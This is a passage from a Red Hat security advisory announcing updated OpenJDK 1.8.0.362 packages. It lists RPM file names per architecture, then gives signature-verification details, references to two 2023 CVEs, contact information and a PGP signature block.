java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21830  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9L/99zjgjWX9erEAQh6/w//RI9EX2stArR4n/6NtrZFHBZEZrqbjRva  
6TJ1TC1lihoGmXbnDPeFJyh6MQx06+bqJsjVM8pYOkJKqNUmEulvWXPoN7ZSKoF4  
EKcuYOTGrKXBK0DQxK20cHnDCQU+ky2DHeIEQkdwR8P54UV47VIidc2dFbVtKgUS  
1vBpE8UZIfHIiLvfdAQ4GJN9i3SRYMT59yqcO8NRXx4y9HRHcWygCwJDBhT1f/iR  
Bhw3wMbdnb7xIxNVFHP4FTg+z6/50sZn2HP7ps+fzDQzCCB8XLKtPIc/ACkoegDg  
9kA5FS76AG68ILfPD15DEi/9qPQEvg3B0XjT9yl2EQimgraJg3CAfYDwdF3duZQd  
GORSP7R/tyCIKXkBccMcyKJ0ekNCuvgjMwmKrRdA41JcVnHqWQRQ75b8D6Lx/J1e  
0ILZlmTQkWWlyGISpV70jbkn+8RwBPDAGwoZa3Hf9CvKsv+XyprN2hztCEy7ZPRn  
Cb0Ccsuok2dmbJ07EQKo9CXNfZ/3ghAOk3fz+FR+lrFAnpzm/35TlVAGmXv4wKNS  
/PrNCaxOTr+SxR6SjLWS51UWMG+p310VBeACL8cjO67yEMboezamKezSrvjtBMPZ  
dhU56pCX1hknTxOQ6GZpUUHAX2Exk1tcuoygeeTufs2Vy5fyDU9bd05VUj+htQH4  
hKYGWAz0KmQ=  
=EqEP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux